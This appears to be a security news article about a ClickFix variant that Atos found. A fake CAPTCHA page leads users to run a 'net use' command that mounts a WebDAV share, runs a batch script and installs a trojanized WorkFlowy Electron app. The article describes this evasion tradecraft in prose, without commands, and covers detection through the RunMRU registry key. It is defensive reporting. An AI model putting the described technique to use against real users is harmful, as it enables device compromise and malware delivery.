The cybersecurity landscape has witnessed the emergence of a new variant of the ClickFix technique, which cleverly exploits network drives to execute malicious commands on users’ devices. Researchers at Atos have uncovered this variant that deviates from traditional methods by utilizing the ‘net use’ command to establish a connection with an external server, subsequently executing a batch file. This innovative approach allows attackers to effectively bypass detection mechanisms and compromise systems.
Mechanics of the New ClickFix Variant
This new variant begins with a familiar tactic, where users are tricked into executing commands via the Win+R shortcut. Once activated, a URL is accessed that maps a network drive from an external server, and a batch script is executed from this drive. This script downloads a ZIP archive, extracting and running the WorkFlowy application with malicious modifications embedded within an ‘.asar’ archive. This acts as both a C2 beacon and a malware dropper.
The initial phase involves a phishing web page that mimics a CAPTCHA, prompting users to initiate the Run application using specific key commands. The subsequent command executed includes a sequence that maps a network drive and triggers a script, marking a departure from previous ClickFix attacks that relied on PowerShell or mshta for further execution. This method allows adversaries to remain undetected by standard security measures.
Bypassing Detection and Evading Defenses
The use of network drives in this ClickFix variant is particularly noteworthy due to its ability to avoid traditional detection strategies. By leveraging the ‘net use’ command, attackers can mount a remote WebDAV share as a local drive, execute a batch script, and promptly remove the mapping, leaving minimal traces. This approach contrasts with prior tactics that often left digital footprints that were easier for security tools to detect.
Atos’s internal Threat Hunting service was instrumental in identifying this threat, as traditional security controls like Microsoft Defender for Endpoint failed to detect it. The focus on the behavioral aspect of the ClickFix technique, particularly execution via the RunMRU registry key, proved crucial in uncovering this sophisticated attack.
Implications for Cybersecurity and Future Outlook
This evolution of the ClickFix technique signifies a broader trend in cybersecurity threats, where attackers are increasingly using native tools and trusted applications to carry out malicious activities. The integration of the malicious code within the Electron application, specifically the WorkFlowy app, demonstrates how attackers can exploit legitimate software to evade detection. This development underscores the need for enhanced threat hunting capabilities and more comprehensive defense strategies.
As this ClickFix variant continues to challenge conventional security measures, organizations must adapt by focusing on proactive threat detection and understanding the evolving tactics employed by adversaries. This highlights the importance of continuous monitoring and analysis of execution contexts rather than relying solely on payload indicators.
